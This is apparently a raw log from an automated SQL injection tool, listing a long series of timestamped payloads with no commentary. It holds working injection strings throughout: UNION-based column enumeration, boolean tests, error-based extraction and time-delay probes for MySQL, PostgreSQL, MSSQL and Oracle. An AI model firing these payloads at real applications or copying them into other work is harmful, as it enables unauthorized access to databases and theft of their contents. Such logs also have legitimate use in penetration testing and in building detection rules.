2514 [13:35:56] [PAYLOAD] 0) UNION ALL SELECT NULL, NULL# AND (5394=5394
2525 [13:35:56] [PAYLOAD] 0) UNION ALL SELECT NULL, NULL, NULL# AND (582=582
2536 [13:35:56] [PAYLOAD] 0) UNION ALL SELECT NULL, NULL, NULL, NULL# AND (2709=2709
2547 [13:35:56] [PAYLOAD] 0) UNION ALL SELECT NULL, NULL, NULL, NULL, NULL# AND (8270=8270
2558 [13:35:56] [PAYLOAD] 0) UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL# AND (5147=5147
2569 [13:35:57] [PAYLOAD] 0) UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND (8286=8286
2580 [13:35:57] [PAYLOAD] 0) UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND (4391=4391
2591 [13:35:57] [PAYLOAD] 0) UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND (4858=4858
2602 [13:35:57] [PAYLOAD] 0) UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND (8237=8237
2613 [13:35:57] [PAYLOAD] 0 UNION ALL SELECT NULL#
2624 [13:35:57] [PAYLOAD] 0 UNION ALL SELECT NULL, NULL#
2635 [13:35:58] [PAYLOAD] 0 UNION ALL SELECT NULL, NULL, NULL#
2646 [13:35:58] [PAYLOAD] 0 UNION ALL SELECT NULL, NULL, NULL, NULL#
2657 [13:35:58] [PAYLOAD] 0 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL#
2668 [13:35:58] [PAYLOAD] 0 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL#
2679 [13:35:58] [PAYLOAD] 0 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL#
2690 [13:35:58] [PAYLOAD] 0 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#
2701 [13:35:59] [PAYLOAD] 0 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#
2712 [13:35:59] [PAYLOAD] 0 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#
2723 [13:35:59] [PAYLOAD] 0') UNION ALL SELECT NULL# AND ('CTPy'='CTPy
2734 [13:35:59] [PAYLOAD] 0') UNION ALL SELECT NULL, NULL# AND ('RxXq'='RxXq
2745 [13:35:59] [PAYLOAD] 0') UNION ALL SELECT NULL, NULL, NULL# AND ('aNyn'='aNyn
2756 [13:35:59] [PAYLOAD] 0') UNION ALL SELECT NULL, NULL, NULL, NULL# AND ('NNby'='NNby
2767 [13:36:00] [PAYLOAD] 0') UNION ALL SELECT NULL, NULL, NULL, NULL, NULL# AND ('kBQH'='kBQH
2778 [13:36:00] [PAYLOAD] 0') UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL# AND ('dKqJ'='dKqJ
2789 [13:36:00] [PAYLOAD] 0') UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND ('Lrur'='Lrur
2800 [13:36:00] [PAYLOAD] 0') UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND ('mRRZ'='mRRZ
2811 [13:36:00] [PAYLOAD] 0') UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND ('XKIH'='XKIH
2822 [13:36:00] [PAYLOAD] 0') UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND ('fkvf'='fkvf
2833 [13:36:01] [PAYLOAD] 0' UNION ALL SELECT NULL# AND 'NlbQ'='NlbQ
2844 [13:36:01] [PAYLOAD] 0' UNION ALL SELECT NULL, NULL# AND 'mDxX'='mDxX
2855 [13:36:01] [PAYLOAD] 0' UNION ALL SELECT NULL, NULL, NULL# AND 'nfYx'='nfYx
2866 [13:36:01] [PAYLOAD] 0' UNION ALL SELECT NULL, NULL, NULL, NULL# AND 'ASJf'='ASJf
2877 [13:36:01] [PAYLOAD] 0' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL# AND 'eain'='eain
2888 [13:36:01] [PAYLOAD] 0' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL# AND 'sIFl'='sIFl
2899 [13:36:02] [PAYLOAD] 0' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'anKQ'='anKQ
2910 [13:36:02] [PAYLOAD] 0' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'XlOB'='XlOB
2921 [13:36:02] [PAYLOAD] 0' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'KhDZ'='KhDZ
2932 [13:36:02] [PAYLOAD] 0' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'snKc'='snKc
2954 [13:36:02] [PAYLOAD] 0) UNION ALL SELECT NULL-- AND (312=312
2965 [13:36:02] [PAYLOAD] 0) UNION ALL SELECT NULL, NULL-- AND (3119=3119
2976 [13:36:03] [PAYLOAD] 0) UNION ALL SELECT NULL, NULL, NULL-- AND (186=186
2987 [13:36:03] [PAYLOAD] 0) UNION ALL SELECT NULL, NULL, NULL, NULL-- AND (7722=7722
2998 [13:36:03] [PAYLOAD] 0) UNION ALL SELECT NULL, NULL, NULL, NULL, NULL-- AND (1665=1665
3009 [13:36:03] [PAYLOAD] 0) UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL-- AND (4216=4216
3020 [13:36:03] [PAYLOAD] 0) UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND (1055=1055
3031 [13:36:03] [PAYLOAD] 0) UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND (8868=8868
3042 [13:36:04] [PAYLOAD] 0) UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND (6936=6936
3053 [13:36:04] [PAYLOAD] 0) UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND (1658=1658
3064 [13:36:04] [PAYLOAD] 0 UNION ALL SELECT NULL--
3075 [13:36:04] [PAYLOAD] 0 UNION ALL SELECT NULL, NULL--
3086 [13:36:04] [PAYLOAD] 0 UNION ALL SELECT NULL, NULL, NULL--
3097 [13:36:04] [PAYLOAD] 0 UNION ALL SELECT NULL, NULL, NULL, NULL--
3108 [13:36:05] [PAYLOAD] 0 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL--
3119 [13:36:05] [PAYLOAD] 0 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL--
3130 [13:36:05] [PAYLOAD] 0 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL--
3141 [13:36:05] [PAYLOAD] 0 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--
3152 [13:36:05] [PAYLOAD] 0 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--
3163 [13:36:05] [PAYLOAD] 0 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--
3174 [13:36:06] [PAYLOAD] 0') UNION ALL SELECT NULL-- AND ('BEjj'='BEjj
3185 [13:36:06] [PAYLOAD] 0') UNION ALL SELECT NULL, NULL-- AND ('fAsq'='fAsq
3196 [13:36:06] [PAYLOAD] 0') UNION ALL SELECT NULL, NULL, NULL-- AND ('rbRQ'='rbRQ
3207 [13:36:06] [PAYLOAD] 0') UNION ALL SELECT NULL, NULL, NULL, NULL-- AND ('bDuv'='bDuv
3218 [13:36:06] [PAYLOAD] 0') UNION ALL SELECT NULL, NULL, NULL, NULL, NULL-- AND ('mVKJ'='mVKJ
3229 [13:36:06] [PAYLOAD] 0') UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL-- AND ('EUKK'='EUKK
3240 [13:36:07] [PAYLOAD] 0') UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND ('FyJL'='FyJL
3251 [13:36:07] [PAYLOAD] 0') UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND ('czOG'='czOG
3262 [13:36:07] [PAYLOAD] 0') UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND ('CHcY'='CHcY
3273 [13:36:07] [PAYLOAD] 0') UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND ('GHlX'='GHlX
3284 [13:36:07] [PAYLOAD] 0' UNION ALL SELECT NULL-- AND 'yltQ'='yltQ
3295 [13:36:07] [PAYLOAD] 0' UNION ALL SELECT NULL, NULL-- AND 'Pjap'='Pjap
3306 [13:36:08] [PAYLOAD] 0' UNION ALL SELECT NULL, NULL, NULL-- AND 'uwrB'='uwrB
3317 [13:36:08] [PAYLOAD] 0' UNION ALL SELECT NULL, NULL, NULL, NULL-- AND 'Axxp'='Axxp
3328 [13:36:08] [PAYLOAD] 0' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL-- AND 'yKqC'='yKqC
3339 [13:36:08] [PAYLOAD] 0' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL-- AND 'rlgQ'='rlgQ
3350 [13:36:08] [PAYLOAD] 0' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'ZxWj'='ZxWj
3361 [13:36:08] [PAYLOAD] 0' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'tlLi'='tlLi
3372 [13:36:09] [PAYLOAD] 0' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'kgSJ'='kgSJ
3383 [13:36:09] [PAYLOAD] 0' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'BwGS'='BwGS
3405 [13:36:09] [PAYLOAD] 1572
3419 [13:36:09] [PAYLOAD] 0')'(")'''(
3433 [13:36:09] [PAYLOAD] 0) AND 7133=1509 AND (5598=5598
3446 [13:36:09] [PAYLOAD] 0) AND 5335=5335 AND (5125=5125
3458 [13:36:10] [PAYLOAD] 0) AND 277=1763 AND (9204=9204
3470 [13:36:10] [PAYLOAD] 0 AND 4705=7451
3483 [13:36:10] [PAYLOAD] 0 AND 5335=5335
3495 [13:36:10] [PAYLOAD] 0 AND 6362=7149
3507 [13:36:10] [PAYLOAD] 0') AND 8733=6445 AND ('XtTT'='XtTT
3520 [13:36:10] [PAYLOAD] 0') AND 5335=5335 AND ('wncg'='wncg
3532 [13:36:11] [PAYLOAD] 0') AND 277=1796 AND ('afiO'='afiO
3544 [13:36:11] [PAYLOAD] 0' AND 7577=8536 AND 'mlmP'='mlmP
3557 [13:36:11] [PAYLOAD] 0' AND 5335=5335 AND 'afDF'='afDF
3569 [13:36:11] [PAYLOAD] 0' AND 36=7582 AND 'sKxT'='sKxT
3608 [13:36:11] [PAYLOAD] 0) AND (SELECT 7766 FROM(SELECT COUNT(*),CONCAT(CHAR(58,113,99,105,58),(SELECT (CASE WHEN (7766=7766) THEN 1 ELSE 0 END)),CHAR(58,111,116,117,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND (8110=8110
3619 [13:36:11] [PAYLOAD] 0 AND (SELECT 7766 FROM(SELECT COUNT(*),CONCAT(CHAR(58,113,99,105,58),(SELECT (CASE WHEN (7766=7766) THEN 1 ELSE 0 END)),CHAR(58,111,116,117,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
3630 [13:36:11] [PAYLOAD] 0') AND (SELECT 7766 FROM(SELECT COUNT(*),CONCAT(CHAR(58,113,99,105,58),(SELECT (CASE WHEN (7766=7766) THEN 1 ELSE 0 END)),CHAR(58,111,116,117,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND ('NwUt'='NwUt
3641 [13:36:12] [PAYLOAD] 0' AND (SELECT 7766 FROM(SELECT COUNT(*),CONCAT(CHAR(58,113,99,105,58),(SELECT (CASE WHEN (7766=7766) THEN 1 ELSE 0 END)),CHAR(58,111,116,117,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND 'iXui'='iXui
3653 [13:36:12] [PAYLOAD] 0) AND 2453=CAST(CHR(58)||CHR(113)||CHR(99)||CHR(105)||CHR(58)||(SELECT (CASE WHEN (2453=2453) THEN 1 ELSE 0 END))::text||CHR(58)||CHR(111)||CHR(116)||CHR(117)||CHR(58) AS NUMERIC) AND (3965=3965
3664 [13:36:12] [PAYLOAD] 0 AND 2453=CAST(CHR(58)||CHR(113)||CHR(99)||CHR(105)||CHR(58)||(SELECT (CASE WHEN (2453=2453) THEN 1 ELSE 0 END))::text||CHR(58)||CHR(111)||CHR(116)||CHR(117)||CHR(58) AS NUMERIC)
3675 [13:36:12] [PAYLOAD] 0') AND 2453=CAST(CHR(58)||CHR(113)||CHR(99)||CHR(105)||CHR(58)||(SELECT (CASE WHEN (2453=2453) THEN 1 ELSE 0 END))::text||CHR(58)||CHR(111)||CHR(116)||CHR(117)||CHR(58) AS NUMERIC) AND ('WJJX'='WJJX
3686 [13:36:12] [PAYLOAD] 0' AND 2453=CAST(CHR(58)||CHR(113)||CHR(99)||CHR(105)||CHR(58)||(SELECT (CASE WHEN (2453=2453) THEN 1 ELSE 0 END))::text||CHR(58)||CHR(111)||CHR(116)||CHR(117)||CHR(58) AS NUMERIC) AND 'cBdF'='cBdF
3698 [13:36:12] [PAYLOAD] 0) AND 4052=CONVERT(INT,(CHAR(58)+CHAR(113)+CHAR(99)+CHAR(105)+CHAR(58)+(SELECT (CASE WHEN (4052=4052) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(111)+CHAR(116)+CHAR(117)+CHAR(58))) AND (3109=3109
3709 [13:36:12] [PAYLOAD] 0 AND 4052=CONVERT(INT,(CHAR(58)+CHAR(113)+CHAR(99)+CHAR(105)+CHAR(58)+(SELECT (CASE WHEN (4052=4052) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(111)+CHAR(116)+CHAR(117)+CHAR(58)))
3720 [13:36:12] [PAYLOAD] 0') AND 4052=CONVERT(INT,(CHAR(58)+CHAR(113)+CHAR(99)+CHAR(105)+CHAR(58)+(SELECT (CASE WHEN (4052=4052) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(111)+CHAR(116)+CHAR(117)+CHAR(58))) AND ('HmOL'='HmOL
3731 [13:36:12] [PAYLOAD] 0' AND 4052=CONVERT(INT,(CHAR(58)+CHAR(113)+CHAR(99)+CHAR(105)+CHAR(58)+(SELECT (CASE WHEN (4052=4052) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(111)+CHAR(116)+CHAR(117)+CHAR(58))) AND 'Wevf'='Wevf
3744 [13:36:12] [PAYLOAD] 0) AND 6666=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(99)||CHR(105)||CHR(58)||(SELECT (CASE WHEN (6666=6666) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(111)||CHR(116)||CHR(117)||CHR(58)||CHR(62))) FROM DUAL) AND (8813=8813
3755 [13:36:13] [PAYLOAD] 0 AND 6666=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(99)||CHR(105)||CHR(58)||(SELECT (CASE WHEN (6666=6666) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(111)||CHR(116)||CHR(117)||CHR(58)||CHR(62))) FROM DUAL)
3766 [13:36:13] [PAYLOAD] 0') AND 6666=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(99)||CHR(105)||CHR(58)||(SELECT (CASE WHEN (6666=6666) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(111)||CHR(116)||CHR(117)||CHR(58)||CHR(62))) FROM DUAL) AND ('MSDc'='MSDc
3777 [13:36:13] [PAYLOAD] 0' AND 6666=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(99)||CHR(105)||CHR(58)||(SELECT (CASE WHEN (6666=6666) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(111)||CHR(116)||CHR(117)||CHR(58)||CHR(62))) FROM DUAL) AND 'fhCn'='fhCn
3810 [13:36:13] [PAYLOAD] 0); SELECT SLEEP(5);--  AND (3456=3456
3821 [13:36:13] [PAYLOAD] 0; SELECT SLEEP(5);--
3832 [13:36:13] [PAYLOAD] 0'); SELECT SLEEP(5);--  AND ('aDKB'='aDKB
3843 [13:36:13] [PAYLOAD] 0'; SELECT SLEEP(5);--  AND 'SyBC'='SyBC
3856 [13:36:13] [PAYLOAD] 0); SELECT PG_SLEEP(5);-- AND (6657=6657
3867 [13:36:13] [PAYLOAD] 0; SELECT PG_SLEEP(5);--
3878 [13:36:14] [PAYLOAD] 0'); SELECT PG_SLEEP(5);-- AND ('Toxz'='Toxz
3889 [13:36:14] [PAYLOAD] 0'; SELECT PG_SLEEP(5);-- AND 'ZITV'='ZITV
3903 [13:36:14] [PAYLOAD] 0); WAITFOR DELAY '0:0:5';-- AND (1694=1694
3914 [13:36:14] [PAYLOAD] 0; WAITFOR DELAY '0:0:5';--
3925 [13:36:14] [PAYLOAD] 0'); WAITFOR DELAY '0:0:5';-- AND ('fNtr'='fNtr
3936 [13:36:14] [PAYLOAD] 0'; WAITFOR DELAY '0:0:5';-- AND 'DtqW'='DtqW
3954 [13:36:14] [PAYLOAD] 0) AND SLEEP(5) AND (4844=4844
3965 [13:36:14] [PAYLOAD] 0 AND SLEEP(5)
3976 [13:36:14] [PAYLOAD] 0') AND SLEEP(5) AND ('zTpO'='zTpO
3987 [13:36:14] [PAYLOAD] 0' AND SLEEP(5) AND 'BKbW'='BKbW
4002 [13:36:15] [PAYLOAD] 0) AND 2481=(SELECT 2481 FROM PG_SLEEP(5)) AND (2313=2313
4013 [13:36:15] [PAYLOAD] 0 AND 2481=(SELECT 2481 FROM PG_SLEEP(5))
4024 [13:36:15] [PAYLOAD] 0') AND 2481=(SELECT 2481 FROM PG_SLEEP(5)) AND ('vRHi'='vRHi
4035 [13:36:15] [PAYLOAD] 0' AND 2481=(SELECT 2481 FROM PG_SLEEP(5)) AND 'lSRI'='lSRI
4050 [13:36:15] [PAYLOAD] 0) WAITFOR DELAY '0:0:5'-- AND (5864=5864
4061 [13:36:15] [PAYLOAD] 0 WAITFOR DELAY '0:0:5'--
4072 [13:36:15] [PAYLOAD] 0') WAITFOR DELAY '0:0:5'-- AND ('XpeT'='XpeT
4083 [13:36:15] [PAYLOAD] 0' WAITFOR DELAY '0:0:5'-- AND 'byYr'='byYr
4097 [13:36:15] [PAYLOAD] 0) AND 1489=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(67)||CHR(77)||CHR(120),5) AND (6784=6784
4108 [13:36:16] [PAYLOAD] 0 AND 1489=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(67)||CHR(77)||CHR(120),5)
4119 [13:36:16] [PAYLOAD] 0') AND 1489=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(67)||CHR(77)||CHR(120),5) AND ('DNvp'='DNvp
4130 [13:36:16] [PAYLOAD] 0' AND 1489=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(67)||CHR(77)||CHR(120),5) AND 'ZYux'='ZYux
4158 [13:36:16] [PAYLOAD] 0) UNION ALL SELECT NULL# AND (4899=4899
4169 [13:36:16] [PAYLOAD] 0) UNION ALL SELECT NULL, NULL# AND (5267=5267
4180 [13:36:16] [PAYLOAD] 0) UNION ALL SELECT NULL, NULL, NULL# AND (3655=3655
4191 [13:36:16] [PAYLOAD] 0) UNION ALL SELECT NULL, NULL, NULL, NULL# AND (3505=3505
4202 [13:36:17] [PAYLOAD] 0) UNION ALL SELECT NULL, NULL, NULL, NULL, NULL# AND (7911=7911
4213 [13:36:17] [PAYLOAD] 0) UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL# AND (4462=4462
4224 [13:36:17] [PAYLOAD] 0) UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND (7866=7866
4235 [13:36:17] [PAYLOAD] 0) UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND (938=938
4246 [13:36:17] [PAYLOAD] 0) UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND (5404=5404
4257 [13:36:17] [PAYLOAD] 0) UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND (5567=5567
4268 [13:36:18] [PAYLOAD] 0 UNION ALL SELECT NULL#
4279 [13:36:18] [PAYLOAD] 0 UNION ALL SELECT NULL, NULL#
4290 [13:36:18] [PAYLOAD] 0 UNION ALL SELECT NULL, NULL, NULL#
4301 [13:36:18] [PAYLOAD] 0 UNION ALL SELECT NULL, NULL, NULL, NULL#
4312 [13:36:18] [PAYLOAD] 0 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL#
4323 [13:36:18] [PAYLOAD] 0 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL#
4334 [13:36:19] [PAYLOAD] 0 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL#
4345 [13:36:19] [PAYLOAD] 0 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#
4356 [13:36:19] [PAYLOAD] 0 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#
4367 [13:36:19] [PAYLOAD] 0 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#
4378 [13:36:19] [PAYLOAD] 0') UNION ALL SELECT NULL# AND ('afjc'='afjc
4389 [13:36:19] [PAYLOAD] 0') UNION ALL SELECT NULL, NULL# AND ('iEUZ'='iEUZ
4400 [13:36:20] [PAYLOAD] 0') UNION ALL SELECT NULL, NULL, NULL# AND ('gIVy'='gIVy
4411 [13:36:20] [PAYLOAD] 0') UNION ALL SELECT NULL, NULL, NULL, NULL# AND ('PDdo'='PDdo
4422 [13:36:20] [PAYLOAD] 0') UNION ALL SELECT NULL, NULL, NULL, NULL, NULL# AND ('WKVc'='WKVc
4433 [13:36:20] [PAYLOAD] 0') UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL# AND ('MIDV'='MIDV
4444 [13:36:20] [PAYLOAD] 0') UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND ('qFDM'='qFDM
4455 [13:36:20] [PAYLOAD] 0') UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND ('kZAW'='kZAW
4466 [13:36:21] [PAYLOAD] 0') UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND ('RyOm'='RyOm
4477 [13:36:21] [PAYLOAD] 0') UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND ('Ltvj'='Ltvj
4488 [13:36:21] [PAYLOAD] 0' UNION ALL SELECT NULL# AND 'uwyP'='uwyP
4499 [13:36:21] [PAYLOAD] 0' UNION ALL SELECT NULL, NULL# AND 'TCuC'='TCuC
4510 [13:36:21] [PAYLOAD] 0' UNION ALL SELECT NULL, NULL, NULL# AND 'WEFc'='WEFc
4521 [13:36:21] [PAYLOAD] 0' UNION ALL SELECT NULL, NULL, NULL, NULL# AND 'vyam'='vyam
4532 [13:36:22] [PAYLOAD] 0' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL# AND 'Xyyv'='Xyyv
4543 [13:36:22] [PAYLOAD] 0' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL# AND 'GIEw'='GIEw
4554 [13:36:22] [PAYLOAD] 0' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'PaAz'='PaAz
4565 [13:36:22] [PAYLOAD] 0' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'GnwA'='GnwA
4576 [13:36:22] [PAYLOAD] 0' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'vNYe'='vNYe
4587 [13:36:22] [PAYLOAD] 0' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'ZcBz'='ZcBz
4609 [13:36:23] [PAYLOAD] 0) UNION ALL SELECT NULL-- AND (6611=6611
4620 [13:36:23] [PAYLOAD] 0) UNION ALL SELECT NULL, NULL-- AND (3808=3808
4631 [13:36:23] [PAYLOAD] 0) UNION ALL SELECT NULL, NULL, NULL-- AND (7835=7835
4642 [13:36:23] [PAYLOAD] 0) UNION ALL SELECT NULL, NULL, NULL, NULL-- AND (4592=4592
4653 [13:36:23] [PAYLOAD] 0) UNION ALL SELECT NULL, NULL, NULL, NULL, NULL-- AND (8423=8423
4664 [13:36:23] [PAYLOAD] 0) UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL-- AND (690=690
4675 [13:36:24] [PAYLOAD] 0) UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND (8412=8412
4686 [13:36:24] [PAYLOAD] 0) UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND (1385=1385
4697 [13:36:24] [PAYLOAD] 0) UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND (3587=3587
4708 [13:36:24] [PAYLOAD] 0) UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND (4040=4040
4719 [13:36:24] [PAYLOAD] 0 UNION ALL SELECT NULL--
4730 [13:36:24] [PAYLOAD] 0 UNION ALL SELECT NULL, NULL--
4741 [13:36:25] [PAYLOAD] 0 UNION ALL SELECT NULL, NULL, NULL--
4752 [13:36:25] [PAYLOAD] 0 UNION ALL SELECT NULL, NULL, NULL, NULL--
4763 [13:36:25] [PAYLOAD] 0 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL--
4774 [13:36:25] [PAYLOAD] 0 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL--
4785 [13:36:25] [PAYLOAD] 0 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL--
4796 [13:36:25] [PAYLOAD] 0 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--
4807 [13:36:26] [PAYLOAD] 0 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--
4818 [13:36:26] [PAYLOAD] 0 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--
4829 [13:36:26] [PAYLOAD] 0') UNION ALL SELECT NULL-- AND ('VUWe'='VUWe
4840 [13:36:26] [PAYLOAD] 0') UNION ALL SELECT NULL, NULL-- AND ('NwHl'='NwHl
4851 [13:36:26] [PAYLOAD] 0') UNION ALL SELECT NULL, NULL, NULL-- AND ('WHXM'='WHXM
4862 [13:36:26] [PAYLOAD] 0') UNION ALL SELECT NULL, NULL, NULL, NULL-- AND ('EmDN'='EmDN
4873 [13:36:27] [PAYLOAD] 0') UNION ALL SELECT NULL, NULL, NULL, NULL, NULL-- AND ('AsNq'='AsNq
4884 [13:36:27] [PAYLOAD] 0') UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL-- AND ('Zjnv'='Zjnv
4895 [13:36:27] [PAYLOAD] 0') UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND ('RDDp'='RDDp
4906 [13:36:27] [PAYLOAD] 0') UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND ('xuEa'='xuEa
4917 [13:36:27] [PAYLOAD] 0') UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND ('NukN'='NukN
4928 [13:36:27] [PAYLOAD] 0') UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND ('YjZl'='YjZl
4939 [13:36:28] [PAYLOAD] 0' UNION ALL SELECT NULL-- AND 'pMdZ'='pMdZ
4950 [13:36:28] [PAYLOAD] 0' UNION ALL SELECT NULL, NULL-- AND 'CTOk'='CTOk
4961 [13:36:28] [PAYLOAD] 0' UNION ALL SELECT NULL, NULL, NULL-- AND 'BBgX'='BBgX
4972 [13:36:28] [PAYLOAD] 0' UNION ALL SELECT NULL, NULL, NULL, NULL-- AND 'MTIn'='MTIn
4983 [13:36:28] [PAYLOAD] 0' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL-- AND 'PJBj'='PJBj
4994 [13:36:28] [PAYLOAD] 0' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL-- AND 'qoKH'='qoKH
5005 [13:36:29] [PAYLOAD] 0' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'KpGD'='KpGD
5016 [13:36:29] [PAYLOAD] 0' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'rBCr'='rBCr
